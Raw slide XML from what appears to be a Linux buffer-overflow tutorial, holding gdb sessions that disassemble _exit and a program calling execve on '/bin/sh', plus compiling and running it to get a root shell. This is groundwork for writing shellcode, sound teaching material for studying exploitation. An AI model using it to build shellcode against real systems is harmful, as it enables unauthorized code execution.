            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9cc &lt;_exit+16&gt;:  int    $0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9ce &lt;_exit+18&gt;:  hlt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x0804d9cf &lt;_exit+19&gt;:  nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>End of assembler dump.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) b *0x0804d9c5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Breakpoint 1 at 0x804d9c5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) r</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Starting program: /home/bof_codes/linux/shellcode/exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Breakpoint 1, 0x0804d9c5 in _exit ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) si</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Program exited normally.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# gcc -static -o shellcode shellcode.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw shellcode]# ./shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>sh-2.05b# exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) disass main</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Dump of assembler code for function main:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481d0 &lt;main+0&gt;:    push   %ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481d1 &lt;main+1&gt;:    mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481d3 &lt;main+3&gt;:    sub    $0x8,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481d6 &lt;main+6&gt;:    and    $0xfffffff0,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481d9 &lt;main+9&gt;:    mov    $0x0,%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481de &lt;main+14&gt;:   sub    %eax,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481e0 &lt;main+16&gt;:   movl   $0x808ef88,0xfffffff8(%ebp)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481e7 &lt;main+23&gt;:   movl   $0x0,0xfffffffc(%ebp)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481ee &lt;main+30&gt;:   sub    $0x4,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f1 &lt;main+33&gt;:   push   $0x0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f3 &lt;main+35&gt;:   lea    0xfffffff8(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f6 &lt;main+38&gt;:   push   %eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f7 &lt;main+39&gt;:   pushl  0xfffffff8(%ebp)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481fa &lt;main+42&gt;:   call   0x804d9f0 &lt;execve&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481ff &lt;main+47&gt;:   add    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x08048202 &lt;main+50&gt;:   leave</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x08048203 &lt;main+51&gt;:   ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>End of assembler dump.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) b main</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Breakpoint 1 at 0x80481d6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) r</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Starting program: /home/bof_codes/linux/shellcode/shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Breakpoint 1, 0x080481d6 in main ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) display/i $pc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481d6 &lt;main+6&gt;: and    $0xfffffff0,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) x/s 0x808ef88</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x808ef88 &lt;_IO_stdin_used+4&gt;:    "/bin/sh"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) i reg $esp $ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>esp            0xbfffe640       0xbfffe640</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>ebp            0xbfffe648       0xbfffe648</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb) si</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481d9 in main ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481d9 &lt;main+9&gt;: mov    $0x0,%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481de in main ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481de &lt;main+14&gt;:        sub    %eax,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481e0 in main ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481e0 &lt;main+16&gt;:        movl   $0x808ef88,0xfffffff8(%ebp)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481e7 in main ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481e7 &lt;main+23&gt;:        movl   $0x0,0xfffffffc(%ebp)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481ee in main ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481ee &lt;main+30&gt;:        sub    $0x4,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f1 in main ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481f1 &lt;main+33&gt;:        push   $0x0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f3 in main ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481f3 &lt;main+35&gt;:        lea    0xfffffff8(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f6 in main ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481f6 &lt;main+38&gt;:        push   %eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481f7 in main ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481f7 &lt;main+39&gt;:        pushl  0xfffffff8(%ebp)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>0x080481fa in main ()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>1: x/i $pc  0x80481fa &lt;main+42&gt;:        call   0x804d9f0 &lt;execve&gt;</a:t>
            </a:r>
